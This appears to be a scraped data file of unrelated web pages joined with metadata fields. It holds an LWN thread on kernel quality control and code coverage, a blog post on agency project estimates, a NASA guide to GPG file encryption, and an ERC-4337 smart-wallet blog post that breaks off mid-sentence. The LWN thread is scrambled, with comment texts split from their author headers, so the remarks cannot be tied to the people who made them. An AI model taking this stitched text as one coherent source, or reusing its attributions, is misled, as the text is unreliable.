The problems with corner cases can be likely caught by combination of unit testing and fuzzing. Drivers testing is more problematic though, there is only so much you can do with qemu and emulated hardware. Proper driver testing needs a reasonably sized lab stacked with hardware and it's much more problematic to set up and maintain which is not going to happen unless somebody invests reasonable amount of resources into it. But there is light at the end of the tunnel as well, as far as I know Linaro has a big automated lab stacked with embedded hardware to run tests on, we are trying to tackle automated server grade hardware lab here in SUSE, and I'm pretty sure there is a lot more outside there just not that visible to the general public.
Posted Dec 10, 2018 12:57 UTC (Mon)
by
There is no alternative to thinking about these problems, I'm afraid. There is no magic automatable road to well-tested software of this complexity.
Posted Dec 10, 2018 13:14 UTC (Mon)
by
Posted Dec 11, 2018 17:37 UTC (Tue)
by
Posted Dec 11, 2018 20:59 UTC (Tue)
by
Posted Dec 9, 2018 17:28 UTC (Sun)
by
Thinking of it computer security is a bit like... healthcare: extremely opaque and nearly impossible for customers to make educated choices about it. From a legal perspective I suspect it's even worse, breach after breach and absolutely zero liability. To top it up class actions are no longer, killed by arbitration clauses in all Terms and Conditions. Brands might be more useful in security though.
https://www.google.com/search?q=site%3Aschneier.com+liabi...
Posted Dec 9, 2018 13:32 UTC (Sun)
by
This is what we do in the i915 community. No feature lands in DRM without a test in IGT, and CI developers are part of the same team.
My view on this is that good quality comes from:
Point 1) is pretty much well done in the Linux community.
Point 2) is hard to justify when tests are not executed, but comes more naturally when we have a good CI system
Point 3) is probably the biggest issue for the Linux CI systems: The driver usually covers a wide variety of HW and configuration which cannot all be tested in CI at all time. This leads to complexity in the CI system that needs to be understood by developers in order to prevent regressions. This is why our CI is maintained and developed in the same team developing the driver.
Point 4) is coming pretty naturally when introducing a filtering system for CI failures. Some failures are known and pending fixing, and we do not want these to be considered as blocking for a patch series. We have been using bugs to create a forum of discussion for developers to discuss how to fix these issues. These bugs are associated to CI failures by a tool doing pattern matching (https://intel-gfx-ci.01.org/cibuglog/). The problem is that these bugs are now every developer's responsibility to fix, and that requires a change in the development culture to hold up some new features until some more important bugs are fixed.
I guess we are getting quite good at CI, and I am really looking forward to us in the CI team to have more time to share our knowledge and tools for others to replicate! We have already started working on an open source toolbox for CI (https://gitlab.freedesktop.org/gfx-ci), as discussed at XDC 2018 (https://xdc2018.x.org/slides/GFX_Testing_Workshop.pdf).
Posted Dec 10, 2018 20:35 UTC (Mon)
by
You may wish to subscribe to fstests@vger.kernel.org or peruse git://git.kernel.org/pub/scm/fs/xfs/xfstests-dev.git if this sort of thing is of interest to you.
Posted Dec 9, 2018 1:46 UTC (Sun)
by
Posted Dec 20, 2018 12:26 UTC (Thu)
by
The guys at the company I was contracted to were trying to abstract out the OS-specific features, like in the OPEN statement. You could declare a file as temporary, which led to it disappearing when it got closed - quite a nice feature IF IMPLEMENTED CORRECTLY!
So, I opened a temporary file on a FUNIT, then later on re-used the same FUNIT for a permanent file. THE OS DIDN'T CLEAR THE TEMPORARY STATUS. So when I closed the permanent file, it disappeared ... :-)
Cheers,
Posted Dec 10, 2018 14:43 UTC (Mon)
by
Posted Dec 10, 2018 18:42 UTC (Mon)
by
Don't get me wrong, code coverage is fine as far as it goes, and it seems likely that the Linux kernel community would do well to do more of it, but it is not a panacea. In particular, beyond a certain point, it is probably not the best place to put your testing effort.
Posted Dec 10, 2018 19:59 UTC (Mon)
by
Posted Dec 10, 2018 20:21 UTC (Mon)
by
Posted Dec 11, 2018 5:51 UTC (Tue)
by
Posted Dec 18, 2018 11:46 UTC (Tue)
by
Posted Dec 18, 2018 14:05 UTC (Tue)
by
Posted Dec 19, 2018 13:43 UTC (Wed)
by
Posted Dec 19, 2018 16:04 UTC (Wed)
by
Posted Dec 20, 2018 3:45 UTC (Thu)
by
Posted Dec 20, 2018 4:37 UTC (Thu)
by
Posted Dec 11, 2018 7:37 UTC (Tue)
by
Interesting, could you share a simplified example?
> My experience with code coverage metrics has been mostly negative.
While error-handling code, corner cases and... backup configurations are notoriously untested, I agree there are diminishing returns and better trade-offs past some point. Curious what is experts' guestimation of where that percentage typically is.
Posted Dec 11, 2018 14:11 UTC (Tue)
by
If only (say) 30% of your code is tested, you very likely need to substantially increase your coverage. If (say) 90% of your code is tested, there is a good chance that there is some better use of your time than getting to 91%. But for any rule of thumb like these, there will be a great many exceptions, for example, the safety-critical code mentioned earlier.
Hey, you asked! :-)
Posted Dec 11, 2018 20:53 UTC (Tue)
by
Sincere thanks!
Posted Jan 5, 2019 18:06 UTC (Sat)
by
Posted Jan 5, 2019 22:29 UTC (Sat)
by
Nevertheless, your last sentence is spot on. It is precisely because rcutorture forces rare code paths and rare race conditions to execute more frequently that the number of RCU bugs reaching customers is kept down to a dull roar.
Posted Dec 10, 2018 21:18 UTC (Mon)
by
Posted Dec 10, 2018 21:50 UTC (Mon)
by
For most types of software, at some point it becomes more important to test more races, more configurations, more input sequences, and more hardware configurations than to provide epsilon increase in coverage by triggering that next assertion. After all, testing and coverage is about reducing risk given the time and resources at hand. Therefore, over-emphasizing one form of testing (such as coverage) will actually increase overall risk due to the consequent neglect of some other form of testing.
Of course, there are some types of software where 100% coverage is reasonable, for example, certain types of safety-critical software. But in this case, you will be living under extremely strict coding standards so as to (among a great many other things) make 100% coverage affordable.
Posted Dec 24, 2018 20:42 UTC (Mon)
by
OTOH, how do you test your safety net? Remember that Ariane 5 was exploded by a safety net that was supposed (and proven) to never trigger.
Posted Dec 25, 2018 0:05 UTC (Tue)
by
But yes, Murphy will always be with us. So even in safety critical code, at the end of the day it is about reducing risk rather than completely eliminating it.
And to your point about Ariane 5's failed proof of correctness... Same issue as the classic failed proof of correctness for the binary search algorithm! Sadly, a proof of correctness cannot prove the assumptions on which it is based. So Murphy will always find a way, but it is nevertheless our job to thwart him. :-)
Posted Dec 30, 2018 11:22 UTC (Sun)
by
E.g.:
In theory, it should never assert. In reality, it is desirable to minimize a risk that 'explosiveness' variable is stored in a failed memory cell, prior that cell is used for indication of explosiveness of any kind.
Or this case:
It is very rare to trigger and almost impossible to test such assertions, but when I saw them triggered in reality, even once in a lifetime, I appreciated their merit.
Posted Dec 30, 2018 15:44 UTC (Sun)
by
But if the point was in fact to warn about unreliable memory, mightn't this sort of fault injection nevertheless be quite useful?
## Kernel quality control, or the lack thereof
**zblaxell** (subscriber, #26385)
[Link]
## Kernel quality control, or the lack thereof
**johannbg** (guest, #65743)
[Link]
## Kernel quality control, or the lack thereof
**mgross** (guest, #38112)
[Link]
## Kernel quality control, or the lack thereof
**vomlehn** (guest, #45588)
[Link] (11 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link] (9 responses)
## Kernel quality control, or the lack thereof
**iabervon** (subscriber, #722)
[Link] (7 responses)
## Kernel quality control, or the lack thereof
**saffroy** (guest, #43999)
[Link] (5 responses)
## Kernel quality control, or the lack thereof
**metan** (subscriber, #74107)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**nix** (subscriber, #2304)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**metan** (subscriber, #74107)
[Link] (2 responses)
## Kernel quality control, or the lack thereof
**nix** (subscriber, #2304)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**mupuf** (subscriber, #86890)
[Link]
1) Well written driver code, peer reviewed to catch architectural issues
2) Good tests exercising the main use case, and corner cases. Tests are considered at the same level as driver code.
3) Good understand of the CI system that will execute these tests
4) Good following of the bugs filed when these tests fail
## Kernel quality control, or the lack thereof
**sandeen** (guest, #42852)
[Link]
## Kernel quality control, or the lack thereof
**luto** (subscriber, #39314)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**Wol** (subscriber, #4433)
[Link]
Wol
## Kernel quality control, or the lack thereof
**xorbe** (guest, #3165)
[Link] (21 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (20 responses)
## Kernel quality control, or the lack thereof
**shemminger** (subscriber, #5739)
[Link] (13 responses)
Managers look at the % numbers and it causes developers to rearrange code to have a single return to maximize the numbers.
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**JdGordy** (subscriber, #70103)
[Link] (6 responses)
## Kernel quality control, or the lack thereof
**error27** (subscriber, #8346)
[Link] (5 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**mathstuf** (subscriber, #69389)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (2 responses)
## Kernel quality control, or the lack thereof
**neilbrown** (subscriber, #359)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link] (4 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**marcH** (subscriber, #57642)
[Link]
## Kernel quality control, or the lack thereof
**joseph.h.garvin** (subscriber, #64486)
[Link] (1 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**NAR** (subscriber, #1313)
[Link] (5 responses)
But anything less than 100% coverage **guarantees** that some part of the code is not tested...
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] (4 responses)
I would expect that defensive coding practices that lead to unreachable code (and thus <100% coverage) are particularly widespread in safety-critical software. I.e., you cannot trigger this particular safety-net code, and you are pretty sure that it cannot be triggered, but not absolutely sure; or even if you are absolutely sure, you foresee that the safety net might become triggerable after maintenance. Will you remove the safety net to increase your coverage metric?
## Kernel quality control, or the lack thereof
**anton** (subscriber, #25547)
[Link] (3 responses)
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link]
## Kernel quality control, or the lack thereof
**GoodMirek** (subscriber, #101902)
[Link] (1 responses)
I saw that multiple times while working on embedded systems.
explosiveness=255;
if explosiveness !=255 then assert;
if <green> then
explosiveness=0;
else
explosiveness=255;
if (explosiveness!=0 and explosiveness!=255) then assert;
## Kernel quality control, or the lack thereof
**PaulMcKenney** (**✭ supporter ✭**, #9624)
[Link] | true | true | true | null | 2024-10-12 00:00:00 | 2018-12-07 00:00:00 | null | null | null | null | null | null |
14,947,199 | https://github.com/shivylp/usher | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
20,391,960 | https://locastic.com/blog/road-to-estimates/ | Road to Estimates | Danilo Trebješanin | In this blog post, I’d like to give an overview of how we come up with project estimates and business proposals for our clients. Working as a Project Manager (PM) for the past 5 years in a software agency setting has led me to all kinds of different theories and methods for tackling the *“How much will it cost?”* question. From do-no-estimates-at-all, to write (and apparently foresee) everything up-front in a huge Tome of Specification, there are many different approaches but none of them quite fit the way our teams in Locastic work.
After some trial and error, I came up with a *“method”* of creating estimates for each project, both time and price-wise. I’m sure some of you reading this will be flabbergasted that we even dare put working hour estimates on anything, and some of you will find this method too imprecise, but it has worked quite well for us in the past year or so. Anyway, I’ll leave a link to a shared google sheets file at the end of the blog post that we use for all types of projects, and if anyone finds it useful I suppose typing this was worth it.
Before we dip our feet in the great unknown of estimates, there are 2 important categories that we need to define:
1. **Types of Projects**
2. **Preconditions of good estimates.**
## Types of Projects
In an agency setting, there are a number of ways a project can be perceived, but right now I want to focus on how we categorize projects based on budget and requirements. A project can have a:
1. **Flexible budget + Project idea**
2. **Fixed budget + Project idea**
3. **Flexible budget + Project specification (and/or wireframes/prototypes)**
4. **Fixed budget + Project specification (and/or wireframes/prototypes).**
I think we can all agree that fixed budgets and agile methodologies don’t go so well together, but let’s face it, if you’re in the business of offering software development services, you are most likely to work with a client that is not tech-savvy and doesn’t care about sprints and story points. **He cares about the final cost of the project, how much funds he needs to raise and how long will it take.** Honestly, I expect these questions from every client, and find it confusing that anyone would ever accept a business proposal without even a range of possible costs and deadlines.
With that said, we always try to avoid giving a single fixed number for the budget. **Try and negotiate a range**, and make sure that if the budget is fixed at least the scope is flexible. If both are fixed (yes, those exist too) then the specification should be considered the Law, and the contract should protect you if even minor changes are made to the scope. These are definitely the hardest to deal with, and should be avoided if possible.
Much more troubling is the difference between project ideas and real specifications. Project ideas are basically the *“specifications”* the client provides you with, which is usually a simple set of explanations, drawings, sketches that represent how the client envisioned the final product. It is **nowhere near** a working prototype or a decent technical spec, and if you base your estimate on those, you’ll be in a lot of trouble real soon. Even with real project specifications that include wireframes and working prototypes, if you look close enough, I’m sure you will find more than a few plot holes and logical mistakes in the application workflow.
Looking at the types of projects mentioned above, the worst case scenario is fixed budget + project idea, and the best one is flexible budget + project specification. In both cases, the method of coming up with an estimate will be the same. The easier (better) one will be more precise and usually faster to do, but both estimates should keep you out of trouble.
## Preconditions of good estimates
With this in mind, let’s talk about the preconditions behind good estimates. For this process to work you will need:
1. **Clickable wireframes/prototypes**
2. **Engaged clients**
3. **Contracts that are adjusted to agile methodologies.**
In the best case, where the client actually gives you a working prototype and has a great technical specification where everything is properly explained, you can skip no.1 in the list above and go straight to estimation. In my 5 year career, I might have had one or two such cases. Usually, upon closer examination, these wireframes and specifications contain a lot of mistakes, missing screens and features that are crucial for the application to work properly.
That is why we always separate the process of working on a project in 2 steps. One would be creating a clickable prototype which will also serve as *“living”* specification of the project. The second step would be developing the project, with the business proposal based on the prototype we developed in the first phase. **These two steps are completely divided**, in a way that the client can actually only ask for a working prototype + specification from our team, and do his own inhouse development. Of course, the goal is to work on the development of the project, but there were cases where we only delivered wireframe and UX services which were beneficial for both the client and the agency.
Without going into too much detail (because this will be covered by one of our UX experts in the near future), the first thing we do is have a number of time-intensive meetings with the client where we write down and sketch each feature as detailed as possible in the given timeframe. User Experience (UX) guys start developing a prototype in Axure on the spot, and refine it afterwards.
Once we’re sure that each scenario that we managed to come up with works on the prototype, we consider it good enough to act as a specification and a frame for a business proposal. It usually takes a couple of iterations to get it done. If possible, try and have the whole team (that will work on this project) participate in these meetings. As you can see, here is where the *“engaged client”* precondition comes into play. The client needs to be a part of the whole process, give feedback, provide necessary materials and explanations etc. This is actually important during development as well, so make sure to have a dedicated individual on the client’s side that will be available and engaged as the rest of your team.
Good contracts are also a huge part of working in an agile software development company. This is really a whole other subject in itself, but for now let’s say that you need to form them in a way that will support agile principles. If the scope changes, the number of working hours must change as well; if a client doesn’t provide you with materials on time, they can’t expect the same deadline; estimates are estimates, and estimates can be wrong, which should also be clearly stated in the contracts with defined steps what to do in that case; work is always done incrementally etc. I think you get the gist of it – don’t use old school contracts that aren’t really fit for software development. **If your process is agile, your contracts should also be.**
## How we do estimates
Now that we defined different types of projects and preconditions for a good estimate, here is how it looks like in practice. This is a fictional project with fictional numbers (I combined a couple of different estimates here) so some numbers might not be realistic, but should serve the purpose of explaining how the estimate table works:
Depending on the project and team size, the number of rows and columns will vary, but the structure should be pretty much the same. As you can see, on the left side of the table, rows will be used to list features (or sections) of the project based on the prototype. There are a couple of miscellaneous sections as well, like Project Setup, Test coverage, Speed optimization that aren’t directly connected to a single feature.
Columns are used to define team roles and min and max working hour estimates for each feature per team role.
As you can notice, the Design column doesn’t have min and max hours defined per feature, because designers like to give estimates based on larger sections (whole pages for example), so they sum it up at the bottom of the table.
The section above is the first part of creating an estimate. As we explained before, our UX team creates a clickable wireframe that, through the contract, becomes the project's living specification. A PM should prepare this estimate table: list all features, add columns for team members, set up formulas etc. The same team that (hopefully) attended these UX meetings will now go through the wireframes and the features in the table together and give their minimum and maximum estimates.
Regarding PM and Quality Assurance (QA) hours, it’s difficult to give estimates based on features, so a number that seems to work very well for us is to calculate one third of working hours from the team member that has the highest TOTAL min and max estimates. In the example above, that would mean that for the first feature, our IONIC developer has 18-22h. One third of that would be 6-7h for PM and QA team roles (we always round to whole numbers).
After the min and max estimates are done by the team, it’s time to come up with a frame for the business proposal. The first thing to do is to calculate the total number of working hours per role and for the whole team:
These calculations are very simple, you just sum up the number of working hours by column for team roles, and then sum them up by min and max for the whole team. The next part is figuring out the timeframe:
- **Divide the number of min and max working hours by 6.5h (which I consider to be an average effective working day for a team member) to get the number of working days**
- **Then divide the number of working days by the average number of working days in a month (about 22) to get the min and max number of months needed to finish the project**
- **Add a 20% buffer to the timeframe because you can't always plan for the unexpected: team member illness, vacations, paid leave etc.**
The last thing remaining is coming up with a budget. We always try to have one team dedicated to only one project until it's completely done. That means the client pays for the whole team per working day. That is why we take the **total number of working hours, divide it by 7h** to get the number of effective working days (1h of daily break), **and multiply it by 8h and an hourly rate of, let's say, €50** to get the estimated min and max budgets.
As you can see, the difference between min and max is quite big, and in the business proposal we usually give a range 20-30% larger than the min estimate and 20-30% smaller than the max estimate to make it more even. We also tend to round up the months in the timeframe if we end up with decimal numbers.
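To make the arithmetic above concrete, here is a minimal sketch in TypeScript, with made-up hour totals; the 6.5h day, 22 working days per month, 20% buffer, one-third PM/QA rule and €50 rate are simply the assumptions described in this post, not a formula you have to follow:

```typescript
// Illustrative only: rates and ratios are the assumptions described in this post.
const HOURS_PER_EFFECTIVE_DAY = 6.5; // average effective working day used for the timeframe
const WORKING_DAYS_PER_MONTH = 22;
const TIMEFRAME_BUFFER = 1.2;        // +20% for illness, vacations, paid leave...
const HOURLY_RATE_EUR = 50;

// PM and QA each get one third of the hours of the role with the highest total, rounded.
const pmOrQaHours = (highestRoleTotal: number): number => Math.round(highestRoleTotal / 3);

function timeframeMonths(totalTeamHours: number): number {
  const workingDays = totalTeamHours / HOURS_PER_EFFECTIVE_DAY;
  return (workingDays / WORKING_DAYS_PER_MONTH) * TIMEFRAME_BUFFER;
}

function budgetEur(totalTeamHours: number): number {
  // The client pays for the whole team per working day:
  // 7h of effective work per day, billed as full 8h days.
  const billedDays = totalTeamHours / 7;
  return billedDays * 8 * HOURLY_RATE_EUR;
}

// Fictional totals of 400 (min) and 600 (max) team hours:
console.log(pmOrQaHours(22));                            // 7h of PM/QA for an 18-22h feature
console.log(timeframeMonths(400), timeframeMonths(600)); // min and max months, buffer included
console.log(budgetEur(400), budgetEur(600));             // min and max budgets in €
```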
## Fin
We always try to be **as transparent as possible** with our clients, so we always share this estimate table with them and include it in the business proposal. They can see how we came up with our estimated numbers and have a detailed breakdown feature by feature. You might have noticed that some of the rows are in orange color – they represent features that can be dropped out of the first MVP phase of the project. **It’s also easier for the client to plan his budget and timeframe this way, **and it’s not unusual for them to remove (or even add) a feature or two once they have the development plan laid out like this to better fit their budget and release schedule.
In some rare cases (for us at least), a client will take a full-time team for a long period without a predefined scope, and you would only need to do these estimates on a feature-by-feature basis. The timeframe estimate will most likely be enough in that case, since the budget is based on the working hours of a full-time team on a monthly basis.
As promised at the beginning of this lengthy blog post, here’s the link to a view only estimate table (you can download it, or c/p it for yourself though).
I'm sure the format of this table could be much more aesthetically pleasing, but we use the business proposal for that. This is just **a tool to come up with a decent estimate** that won't cause us issues later on in the project. Just to be clear, we did sometimes go over budget with these estimates, but by a reasonable amount, and it was much easier to discuss these extra costs with our clients. After all, they were involved in creating the prototypes and estimates and are fully aware of what goes into the development of their project feature by feature.
I hope some of you at least will find this blog post helpful, and I would love to hear your way of dealing with project estimates, and ideas to improve the process. | true | true | true | In this blog post, I’d like to give an overview of how we come up with project estimates and business proposals for our clients. Working as a Project Manager (... | 2024-10-12 00:00:00 | 2019-07-09 00:00:00 | website | locastic.com | Locastic | null | null |
41,190,780 | https://www.nytimes.com/2024/08/07/science/sea-lion-videos-cameras.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
6,260,358 | http://weblogs.asp.net/jgalloway/archive/2013/08/22/adding-an-audio-play-indicator-to-your-page-s-tab-with-a-few-lines-of-javascript.aspx#.UhaIoA8Y0MU.hackernews | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,946,172 | http://www.nas.nasa.gov/hecc/support/kb/using-gpg-to-encrypt-your-data_242.html | Using GPG to Encrypt Your Data | null | Encryption helps protect your files during inter-host file transfers that use protocols that are not already encrypted—for example, when using ftp or when using shiftc without the --secure option. We recommend using the GNU Privacy Guard (GPG), an Open Source OpenPGP-compatible encryption system.
GPG is installed on Pleiades, Endeavour, and Lou at /usr/bin/gpg. If you do not have GPG installed on the system(s) that you would like to use for transferring files, please see the GPG website.
Choosing What Cipher to Use
We recommend using the cipher AES256, which uses a 256-bit Advanced Encryption Standard (AES) key to encrypt the data. Information on AES can be found at the National Institute of Standards and Technology's Computer Security Resource Center.
You can set your cipher in one of the following ways:
Add cipher-algo AES256 (the option without the two leading dashes) to your ~/.gnupg/gpg.conf file.
Add --cipher-algo AES256 in the command line to override the default cipher, CAST5.
Examples
If you choose not to add the cipher-algo AES256 to your gpg.conf file, you can add --cipher-algo AES256 on any of these simple example command lines to override the default cipher, CAST5.
Creating an Encrypted File
Both commands below are identical. They encrypt the test.out file and produce the encrypted version in the test.gpg file:
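% gpg --output test.gpg --symmetric test.out
% gpg -o test.gpg -c test.out

(Typical invocations: -c and -o are the short forms of --symmetric and --output; add --cipher-algo AES256 to either one if it is not already set in your gpg.conf.)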
You will be prompted for a passphrase, which will be used later to decrypt the file.
Decrypting a File
The following command decrypts the test.gpg file and produces the test.out file:
% gpg --output test.out -d test.gpg
You will be prompted for the passphrase that you used to encrypt the file. If you don't use the --output option, the command output goes to STDOUT. If you don't use any flags, it will decrypt to a file without the .gpg suffix. For example, using the following command line would result in the decrypted data in a file named "test":
% gpg test.gpg
Selecting a Passphrase
Your passphrase should have sufficient information entropy. We suggest that you include five words of 5-10 letters in size, chosen at random, with spaces, special characters, and/or numbers embedded into the words.
You need to be able to recall the passphrase that was used to encrypt the file.
Factors that Affect Encrypt/Decrypt Speed on NAS Filesystems
We do not recommend using the --armour option for encrypting files that will be transferred to/from NAS systems. This option is mainly intended for sending binary data through email, not via transfer commands such as ftp or shiftc with the --secure option. The file size tends to be about 33% bigger than without this option, and encrypting the data takes about 10-15% longer.
The level of compression used when encrypting/decrypting affects the time required to complete the operation. There are three options for the compression algorithm: none, zip, and zlib.
If your data is not compressible, --compress-algo 0 (none) gives you a performance increase of about 50% compared to --compress-algo 1 or --compress-algo 2.
If your data is highly compressible, choosing the zlib or zip option will not only increase the speed by 20-50%, it will also reduce the file size by up to 20x. For example, in one test on a NAS system, a 517 megabyte (MB) highly compressible file was compressed to 30 MB.
The zlib option is not compatible with PGP 6.x, but neither is the cipher algorithm AES256. Using the zlib option is about 10% faster than using the zip option on a NAS system, and zlib compresses about 10% better than zip.
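For example, the compression choice can be made per command, using either the names or the numeric values mentioned above (zlib for compressible data, none for data that is already compressed):

% gpg --compress-algo zlib --cipher-algo AES256 -o test.gpg -c test.out
% gpg --compress-algo none --cipher-algo AES256 -o test.gpg -c test.out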
Random Benchmark Data
We tested the encryption/decryption speed of three different files (1 MB, 150 MB, and 517 MB) on NAS systems. The file used for the 1 MB test was an RPM file, presumably already compressed, since the resulting file sizes for the none/zip/zlib options were within 1% of each other. The 150 MB file was an ISO file, also assumed to be a compressed binary file for the same reasons. The 517 MB file was a text file. These runs were performed on a CXFS filesystem when many other users' jobs were running. The performance reported here is for reference only, and not the best or worst performance you can expect.
Using AES256 as the Cipher Algorithm

with --armour: ~5.5 secs to encrypt the 1 MB file; ~40 secs to encrypt the 150 MB file
without --armour: ~4 secs to encrypt the 1 MB file; ~35 secs to encrypt the 150 MB file
without --armour, zlib compression: for the 150 MB file, ~33 secs to encrypt and ~28 secs to decrypt to file; for the 517 MB file, ~33 secs to encrypt (resultant file size ~30 MB) and ~34 secs to decrypt to file
without --armour, zip compression: for the 150 MB file, ~36 secs to encrypt and ~31 secs to decrypt to file; for the 517 MB file, ~38 secs to encrypt (resultant file size ~33 MB) and ~34 secs to decrypt to file
without --armour, no compression: for the 150 MB file, ~19 secs to encrypt and ~25 secs to decrypt to file; for the 517 MB file:
~49 secs, resultant file size ~517 MB; ~75 secs to decrypt to file | true | true | true | Use GPG with the cipher AES256, without the --armour option, and with compression to encrypt your files during inter-host transfers. | 2024-10-12 00:00:00 | 2022-04-28 00:00:00 | null | null | null | null | null | null |
306,971 | http://www.bloomberg.com/apps/news?pid=20601087&sid=aIRza4.azeC4&refer=worldwide | Bloomberg | null | To continue, please click the box below to let us know you're not a robot.
Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy.
For inquiries related to this message please contact our support team and provide the reference ID below. | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
37,437,222 | https://www.coinfabrik.com/blog/unlocking-the-potential-of-erc-4337-innovations-in-crypto-wallets/ | Unlocking ERC-4337: Crypto Wallet Innovations | CoinFabrik | CoinFabrik | ## Introduction
BLOK Capital approached CoinFabrik to help them specify and implement a prototype of a new asset management protocol. The product requirements were pretty straightforward: the solution should be decentralized, and users must keep full custody of their tokens while letting a wealth manager of their choosing invest their crypto assets on their behalf.
## First steps
Working closely with BLOK Capital stakeholders, we started by going through the requirements in order to reach a solid understanding of our customer’s vision. This collaborative effort between BLOK Capital and CoinFabrik’s product and technical experts was key to successfully defining the features that would comprise BLOK’s prototype and validating its technical feasibility.
Taking into account the main product propositions (decentralization, self-custody, and wallet management by a third party), we immediately recognized the potential for innovation. Naturally, our focus shifted to crafting an architecture that could support such a product while meeting all the stipulated requirements.
After extensive research, we arrived at the conclusion that the newly introduced Ethereum standard, ERC-4337, could precisely align with BLOK’s goals.
## Why ERC-4337?
ERC-4337, introduced in February 2023, marks a significant milestone toward web3 mass adoption. It empowers the implementation of robust and versatile wallets, setting it apart from traditional crypto wallets. ERC-4337 wallets, unlike their conventional counterparts, function as smart contracts, enabling the integration of exciting additional features. Furthermore, ERC-4337 promises a superior user experience by offering features like social authentication, account recovery, and reduced transaction fees for users.
## ERC-4337 account abstraction
ERC-4337 account abstraction, in simple terms, is a way to make using cryptocurrencies more flexible and user-friendly.
Imagine your cryptocurrency wallet as a house with a locked front door. With traditional wallets, you need to use a specific key to open your door, just like you need a private key to access your cryptocurrency. ERC-4337, however, allows you to have a smart front door that can open in different ways, not just with a key.
### Here’s how it works:
#### Keyless Entry
Instead of just using a key (private key), you can set up your front door to recognize your face, your voice, or even a secret code. In cryptocurrency terms, this means you can access your funds not just with a private key but with other methods like biometrics (your fingerprint or face), passwords, or even multi-factor authentication.
#### Multiple Ways In
With ERC-4337, you can have multiple ways to access your funds. It’s like having a front door that opens not just for you but also for your family members or trusted friends. In cryptocurrency, this could mean you can share access to your funds with someone you trust, like a financial advisor, without giving them your private key. They can help you manage your money without having full control.
#### Cost Savings
ERC-4337 can also help save on transaction fees. Think of it like having a discount card for your favorite store. You get to pay less when you use it. Similarly, with ERC-4337, you might pay fewer fees when you make transactions on the blockchain.
So, ERC-4337 account abstraction is like upgrading your cryptocurrency wallet’s front door to be smarter, more secure, and more versatile. It gives you different ways to access your funds, allows you to share access with trusted people, and might even save you some money in the process.
## ERC-4337 main components
First, it’s important to go through the main components of the ERC-4337 architecture.
**UserOperation**: These are pseudo-transaction objects used to execute transactions with Smart Accounts. They capture the user's intent: what the user wants the account to do (a minimal sketch of the fields is shown after this list).
**Bundler**: Bundlers are actors that package UserOperations from a mempool and send them to the EntryPoint contract on the blockchain. They listen to at least one UserOperation mempool, run simulations, group an array of UserOperations, and relay packets to the EntryPoint.
**EntryPoint**: EntryPoint is a unique contract that serves as a central entity for all Smart Accounts and Paymaster ERC-4337. It coordinates the verification and execution of a UserOperation. For this reason, it’s crucial that all implementations of an EntryPoint are audited and immutable.
**Verification Loop**: It verifies that each UserOperation is valid by comparing it with both the Smart Account and the Paymaster contract.
**Execution Loop**: It sends each UserOperation to the Smart Account. The verification cycle also ensures that the Smart Account or Paymaster contract can cover the maximum gas cost for each user operation.
**Smart Accounts**: These are end-user accounts. At a minimum, they must verify whether they will accept a user operation during the verification cycle. Additional features can be added to support other account functions, such as social recovery and multiple operations.
Additional functionalities provided by ERC-4337 standard include:
**Paymaster**: It sponsors the gas fees for a UserOperation, and two things are required. One is to check whether it accepts the UserOperation during the verification cycle. The other is to execute the required fee logic in the execution loop.
**Aggregator**: It is an entity trusted by contract accounts to validate signatures. They are often used to aggregate signatures from multiple user operations together.
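To make the UserOperation component above concrete, here is a minimal TypeScript sketch of the fields defined by version 0.6 of the standard; it is illustrative only and not taken from BLOK Capital's implementation:

```typescript
// Rough shape of an ERC-4337 (v0.6) UserOperation; field names follow the standard.
interface UserOperation {
  sender: string;               // the Smart Account sending the operation
  nonce: bigint;                // anti-replay value tracked by the EntryPoint
  initCode: string;             // factory address + calldata to deploy the account on first use ("0x" if already deployed)
  callData: string;             // the call the Smart Account should execute
  callGasLimit: bigint;         // gas for the execution phase
  verificationGasLimit: bigint; // gas for the verification phase
  preVerificationGas: bigint;   // gas compensating the Bundler's overhead
  maxFeePerGas: bigint;         // EIP-1559-style fee fields
  maxPriorityFeePerGas: bigint;
  paymasterAndData: string;     // Paymaster address + data ("0x" if the account pays its own gas)
  signature: string;            // checked by the account's validator (or an Aggregator)
}
```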
## A real-world application: ERC-4337 frameworks and user authentication
After some research on the available smart wallets solutions based upon ERC-4337 we decided to use the framework offered by ZeroDev.
ZeroDev framework allows to create both custodial and non-custodial wallets, use powerful features -such as gas sponsoring, transaction batching or social recovery- and extend the wallet functionality with custom built plugins.
Getting into details, every smart wallet created with ZeroDev is a smart contract known as Kernel, which includes the minimum wallet features. However, the nice part is that this Kernel contract supports the addition of almost any advanced wallet logic.
On the other hand, another important feature of ZeroDev is the splitting of transactions into validation and execution phases.
